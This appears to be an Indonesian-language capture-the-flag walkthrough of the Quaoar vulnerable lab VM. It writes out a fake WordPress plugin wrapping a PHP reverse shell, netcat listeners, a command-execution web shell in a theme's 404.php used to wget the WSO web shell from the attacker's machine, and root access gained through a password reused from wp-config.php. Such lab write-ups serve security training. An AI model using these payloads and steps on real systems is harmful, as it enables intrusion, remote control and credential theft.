/var/www/wordpress/wp-content/themes/twentyfourteen total 864K drwxr-xr-x 9 www-data www-data 4.0K Oct 12 2016 . drwxr-xr-x 5 www-data www-data 4.0K Oct 16 2016 .. -rw-r--r-- 1 www-data www-data 823 Jan 23 22:30 404.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 archive.php -rw-r--r-- 1 www-data www-data 1.9K Oct 12 2016 author.php -rw-r--r-- 1 www-data www-data 1.5K Oct 12 2016 category.php -rw-r--r-- 1 www-data www-data 2.3K Oct 12 2016 comments.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content-aside.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content-audio.php -rw-r--r-- 1 www-data www-data 1.1K Oct 12 2016 content-featured-post.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content-gallery.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content-image.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content-link.php -rw-r--r-- 1 www-data www-data 961 Oct 12 2016 content-none.php -rw-r--r-- 1 www-data www-data 871 Oct 12 2016 content-page.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content-quote.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content-video.php -rw-r--r-- 1 www-data www-data 2.2K Oct 12 2016 content.php drwxr-xr-x 2 www-data www-data 4.0K Oct 12 2016 css -rw-r--r-- 1 www-data www-data 946 Oct 12 2016 featured-content.php -rw-r--r-- 1 www-data www-data 728 Oct 12 2016 footer.php -rw-r--r-- 1 www-data www-data 16K Oct 12 2016 functions.php drwxr-xr-x 3 www-data www-data 4.0K Oct 12 2016 genericons -rw-r--r-- 1 www-data www-data 2.3K Oct 12 2016 header.php -rw-r--r-- 1 www-data www-data 2.6K Oct 12 2016 image.php drwxr-xr-x 2 www-data www-data 4.0K Oct 12 2016 images drwxr-xr-x 2 www-data www-data 4.0K Oct 12 2016 inc -rw-r--r-- 1 www-data www-data 1.6K Oct 12 2016 index.php drwxr-xr-x 2 www-data www-data 4.0K Oct 12 2016 js drwxr-xr-x 2 www-data www-data 4.0K Oct 12 2016 languages drwxr-xr-x 2 www-data www-data 4.0K Oct 12 2016 page-templates -rw-r--r-- 1 www-data www-data 1.2K Oct 12 2016 page.php -rw-r--r-- 1 www-data www-data 16K Oct 12 2016 rtl.css -rw-r--r-- 1 www-data www-data 603K Oct 12 2016 screenshot.png -rw-r--r-- 1 www-data www-data 1.3K Oct 12 2016 search.php -rw-r--r-- 1 www-data www-data 340 Oct 12 2016 sidebar-content.php -rw-r--r-- 1 www-data www-data 395 Oct 12 2016 sidebar-footer.php -rw-r--r-- 1 www-data www-data 848 Oct 12 2016 sidebar.php -rw-r--r-- 1 www-data www-data 1.1K Oct 12 2016 single.php -rw-r--r-- 1 www-data www-data 74K Oct 12 2016 style.css -rw-r--r-- 1 www-data www-data 1.6K Oct 12 2016 tag.php -rw-r--r-- 1 www-data www-data 2.4K Oct 12 2016 taxonomy-post_format.php uid=33(www-data) gid=33(www-data) groups=33(www-data)
Alternative Inject Fake Plugin
Di Kali Linux
cd ~ cp /usr/share/webshells/php/php-reverse-shell.php ~/shelly.php
Beri plugin wrapper
<?php /* Plugin Name: Shelly Plugin URI: http://localhost Description: Bla Bla Bla Author: Pingmoose Version: 1.0.1 Author URI: http://localhost */ COPY CONTENTS OF shelly.php HERE ?>
Masuk ke shell Kali, cek IP address
ifconfig eth0
Misalnya, IP address 192.168.0.94 Edit shelly shell ubah,
$ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS
Menjadi
$ip = '192.168.0.94'; // CHANGE THIS $port = 4444; // CHANGE THIS
Zip,
zip shelly-plugin.zip shelly.php mv shelly-plugin.zip /home/kali chmod -Rf 777 /home/kali/shelly-plugin.zip chown kali: /home/kali/shelly-plugin.zip
Masuk ke
http://192.168.0.122/wordpress/wp-admin/plugins.php
Upload, JANGAN di aktifkan
Start netcat listener di Kali
Start 4444 listener
nc -nvlp 4444
Aktifkan shelly shell
http://192.168.0.122/wordpress/wp-content/plugins/shelly-plugin/shelly.php
Di kali linux CLI akan ada kata2,
nc -nvlp 4444 listening on [any] 4444 ... connect to [192.168.0.94] from (UNKNOWN) [192.168.0.122] 48071 Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux 21:23:43 up 1:10, 0 users, load average: 0.00, 0.01, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
Akses shell yang lebih dalam,
$ whoami www-data $ whereis python python: /usr/bin/python2.7 /usr/bin/python /etc/python2.7 /etc/python /usr/lib/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@Quaoar:/$
Dapatkan flag yang pertama,
www-data@Quaoar:/$ cd /home cd /home www-data@Quaoar:/home$ ls ls wpadmin www-data@Quaoar:/home$ cat wpadmin cat wpadmin cat: wpadmin: Is a directory www-data@Quaoar:/home$ cd wpadmin cd wpadmin www-data@Quaoar:/home/wpadmin$ ls ls flag.txt www-data@Quaoar:/home/wpadmin$ cat flag.txt cat flag.txt 2bafe61f03117ac66a73c3c514de796e www-data@Quaoar:/home/wpadmin$
Berburu Flag 2: Root
Cek,
cd / find / -perm -4000 -user root 2> /dev/null
Tampaknya tidak ada yang terlalu menarik. Cek wp-config.php,
cat /var/www/wordpress/wp-config.php
Hasilnya,
..... /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'rootpassword!'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ); .....
DB_PASSWORD rootpassword! - Keren! Jajal,
ww-data@Quaoar:/$ su su Password: rootpassword! root@Quaoar:/#
Masuk :) .. Root Flag
root@Quaoar:/# cd /root cd /root root@Quaoar:~# ls -al ls -al total 48 drwx------ 6 root root 4096 Nov 30 2016 . drwxr-xr-x 22 root root 4096 Oct 7 2016 .. drwx------ 2 root root 4096 Oct 7 2016 .aptitude -rw------- 1 root root 410 Jan 24 04:38 .bash_history -rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc drwx------ 2 root root 4096 Oct 15 2016 .cache ---------- 1 root root 33 Oct 22 2016 flag.txt -rw-r--r-- 1 root root 140 Apr 19 2012 .profile drwx------ 2 root root 4096 Oct 26 2016 .ssh -rw------- 1 root root 4740 Nov 30 2016 .viminfo drwxr-xr-x 8 root root 4096 Jan 29 2015 vmware-tools-distrib root@Quaoar:~# cat flag.txt cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb root@Quaoar:~#
Flag root adalah
8e3f9ec016e3598c5eec11fd3d73f6fb
Berburu Flag 3: Root
Cek /etc Tampaknya /etc/cron.d/php5 menarik, Lakukan,
root@Quaoar:~# cd /etc cd /etc root@Quaoar:/etc# ls *cron* ls *cron* crontab cron.d: php5 cron.daily: apache2 bsdmainutils man-db samba apport dpkg mlocate standard apt libvirt-bin passwd tomcat6 aptitude logrotate popularity-contest update-notifier-common cron.hourly: cron.monthly: cron.weekly: apt-xapian-index man-db root@Quaoar:/etc# cat cron.d/php5 cat cron.d/php5 # /etc/cron.d/php5: crontab fragment for php5 # This purges session files older than X, where X is defined in seconds # as the largest value of session.gc_maxlifetime from all your php.ini # files, or 24 minutes if not defined. See /usr/lib/php5/maxlifetime # Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de # Look for and purge old sessions every 30 minutes 09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete root@Quaoar:/etc#
Flag Root adalah,
d46795f84148fd338603d0d6a9dbf8de
Beberapa Catatan Percobaan Sebelumnya
Percobaan Privilege Escalation (getting root)
cara-cara di atas semua tidak berhasil. Terpaksa menggunakan bruteforce.
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20/var/www/wordpress http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20/var/www/wordpress/wp-config.php
Karena saya tidak menemukan jalan lain selain bruteforce, namun tentunya pusing juga kalau bruteforce rootnya karena /etc/shadow tidak dapat dibuka.
Akhirnya saya coba iseng melihat konfigurasi wordpress, siapa tau password rootnya adalah password database server
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'rootpassword!'); /** MySQL hostname */ define('DB_HOST', 'localhost');
Lalu saya cobakan saja password rootpassword! pada root
Okay! berhasil sudah sampai disini, yey!!!
Epilogue Terus terang aja sih, ini VM sebenarnya gampang cuma malesinnya adalah maenan bruteforce dan tebak password.
Tentunya walaupun mudah, ini juga merupakan hal yang sulit buat kalian yang masih baru dalam dunia hacking. Tebak password itu bisa gw bilang salah satu “skill dewa” karena kamu harus punya sense yang bagus untuk itu.
Paling segitu dulu saja, stay tuned untuk artikel lainnya yah! :D
Referensi
Percoban Menggunakan WSO Webshell
Upload WSO Shell
Download WSO
cd /home/kali/Downloads/ wget https://github.com/mIcHyAmRaNe/wso-webshell/archive/refs/heads/master.zip unzip master.zip mv wso-webshell-master/wso.php . mv wso.php wso.txt
Default setting WSO Shell ini
Password ghost287 Edit line 7 (md5 hash) Email test@testmail.com Edit line 4
File wso.txt ada di /home/kali/Downloads/ Jalankan web server di Kali linux
python3 -m http.server --bind 0.0.0.0 9000
Cek IP address kali linux
ifconfig
Misalnya IP address 192.168.0.62, cek apakah bisa di akses via web alamat
http://192.168.0.62:9000/ http://192.168.0.62:9000/wso.txt
Upload menggunakan exploit,
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=wget%20http://192.168.0.62:9000/wso.txt http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv%20wso.txt%20wso.php http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20-la
Coba WSO Shell
Jalankan Remote Shell WSO Shell
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=php%20wso.php
Di Kali Linux jalankan,
nc -lvp 31337
Tampaknya belum bisa jalan WSO shell
WSO Shell, silahkan yang mau jalan2 Saatnya connectback shell, tinggal jalankan perintah nc -lvp 31337, dan buka bagian network. Masukkan IP kamu dan jadilah shell seperti ini